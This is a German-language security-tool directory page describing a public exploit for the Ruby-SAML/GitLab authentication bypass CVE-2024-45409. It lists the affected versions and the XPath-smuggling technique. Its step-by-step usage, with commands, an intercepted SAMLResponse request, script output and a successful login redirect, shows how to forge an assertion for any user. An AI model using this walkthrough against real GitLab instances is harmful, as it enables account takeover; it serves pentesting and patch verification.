Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-45409 — Ruby-SAML / GitLab Authentifizierungs-Bypass (CVE-2024-45409) Exploit | Kitploit
Tools/GitHubGitHub/synacktiv/cve-2024-45409
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubsynacktiv/cve-2024-45409

CVE-2024-45409

Ruby-SAML / GitLab Authentifizierungs-Bypass (CVE-2024-45409) Exploit

Repository anzeigen
8413vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Ruby-SAML / GitLab Authentifizierungs-Bypass (CVE-2024-45409) Exploit

Dieses Skript nutzt die CVE-2024-45409 aus, die es einem nicht authentifizierten Angreifer mit Zugriff auf ein signiertes SAML-Dokument des IDP ermöglicht, eine gefälschte SAML-Antwort/-Assertion zu erstellen und sich als beliebiger Benutzer bei GitLab anzumelden.

Alle folgenden GitLab-Versionen (CE/EE) sind verwundbar:

  • < 16.11.10
  • 17.0.0 < 17.0.8
  • 17.0.0 < 17.1.8
  • 17.0.0 < 17.2.7
  • 17.0.0 < 17.3.3

Dieser Exploit injiziert den DigestValue der modifizierten Assertion in das StatusDetail-Element, wodurch der XPath-Selektor geschmuggelt werden kann, der diesen Wert anstelle des im SignedInfo-Block verwendet.

Voraussetzungen

  • Eine gültige, vom IDP ausgestellte SAML-Antwort

Verwendung

root@kitploit:~
apt install python3-lxml

Fangen Sie zuerst die URL und die Base64-kodierte IDP-SAML-Antwort ab, ändern Sie dann den XML-Inhalt mit dem Skript.

root@kitploit:~
POST /users/auth/saml/callback HTTP/1.1
Host: gitlab.test.local
[...]

SAMLResponse=PHNhbWxwOlJlc3Bv[...]
root@kitploit:~
$ python3 CVE-2024-45409.py -r response.url_base64 -n [email protected] -d -e -o response_patched.url_base64
[+] Antwort wird analysiert
	Digest-Algorithmus: sha256
	Kanonisierungsmethode: http://www.w3.org/2001/10/xml-exc-c14n#
[+] Signatur aus Antwort entfernt
[+] Assertion-ID geändert
[+] Assertion-NameID geändert
[+] Assertion-Bedingungen geändert
[+] Signatur in die Assertion verschoben
[+] Antwort-ID geändert
[+] Bösartige Referenz eingefügt
[+] Signaturreferenz geklont
[+] StatusDetail-Element erstellt
[+] Digest-Wert geändert
[+] Patched-Datei in response_patched.url_base64 geschrieben

Ersetzen Sie anschließend den Parameter SAMLResponse mit der Ausgabe des Skripts. Wenn die Authentifizierung erfolgreich ist, werden Sie zur GitLab-Startseite weitergeleitet.

root@kitploit:~
HTTP/1.1 302 Found
Location: http://gitlab.test.local/
[...]

<html><body>Sie werden <a href="http://gitlab.test.local/">weitergeleitet</a>.</body></html>

Referenzen

  • https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
  • https://github.com/advisories/GHSA-jw9c-mfg7-9rx2
  • https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-45409
  • https://www.cvedetails.com/cve/CVE-2024-45409/
Tool herunterladen